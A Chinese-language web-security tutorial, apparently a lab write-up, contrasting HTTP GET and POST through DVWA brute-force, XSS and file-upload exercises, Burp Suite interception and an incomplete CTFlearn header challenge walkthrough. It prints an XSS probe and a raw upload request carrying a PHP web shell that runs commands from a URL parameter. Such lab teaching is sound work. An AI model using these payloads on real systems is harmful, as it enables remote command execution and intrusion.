从GET到POST：HTTP请求的攻防实战与CTF挑战解析

初探HTTP请求：当浏览器遇见服务器

基础协议差异可视化

# 典型GET请求
GET /login.php?username=admin&password=p@ssw0rd HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0# 典型POST请求
POST /login.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 33username=admin&password=p@ssw0rd

核心差异对比表：

DVWA实战：观察两种请求的渗透差异

实验环境搭建

1. 启动DVWA（安全级别设为Low）
2. 访问"Brute Force"模块
3. 分别测试GET/POST表单

GET方式攻击痕迹：

GET /dvwa/vulnerabilities/brute/?username=admin&password=password&Login=Login HTTP/1.1

攻击参数直接暴露在URL中，可在以下位置追踪：

• 浏览器历史记录
• Web服务器访问日志
• 网络设备流量监控

POST方式攻击示例：

POST /dvwa/vulnerabilities/brute/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 38username=admin&password=password&Login=Login

虽然隐蔽性稍强，但未加密传输仍可通过：

• 流量抓包工具（如Wireshark）
• 中间人攻击（MITM）
• 客户端存储的Form Data

Burp Suite拦截分析：透视协议本质

拦截配置步骤

1. 设置浏览器代理：127.0.0.1:8080
2. 启动Burp Suite并开启Proxy拦截
3. 分别提交GET/POST表单

GET请求捕获实例：

GET /vulnerabilities/xss_r/?name=<script>alert(1)</script> HTTP/1.1
Host: localhost
Cookie: PHPSESSID=abc123; security=low

POST请求捕获对比：

POST /vulnerabilities/upload/ HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123
Content-Length: 285------WebKitFormBoundaryABC123
Content-Disposition: form-data; name="uploaded"; filename="test.php"
Content-Type: application/x-php<?php system($_GET['cmd']); ?>
------WebKitFormBoundaryABC123--

关键发现：

• GET请求直接将攻击载荷暴露在URL中
• POST请求可通过多种编码方式隐藏攻击特征
• 文件上传等复杂操作必须使用POST

CTFlearn实战：HTTP基础题型破解

题目：HTTP Basic (CTFlearn Problem 104)

题干描述：

访问 http://165.227.106.113/header.php 获取flag

解题过程：

1. 初始访问返回403 Forbidden

2. 使用curl探测响应头：

   curl -I http://165.227.106.113/header.php
   

   发现提示：

   HTTP/1.1 403 Forbidden
   Hint: Missing required header
   

3. 使用Burp Suite重放请求，观察服务器预期：

   GET /header.php HTTP/1.1
   Host: 165.227.106.113
   

4. 尝试添加常用头部：

   curl -H "User-Agent: CTFlearn" http://165.227.106.113/header.php
   

5. 通过迭代测试发现需要特定头部：

   curl -H "Referer: ctflearn.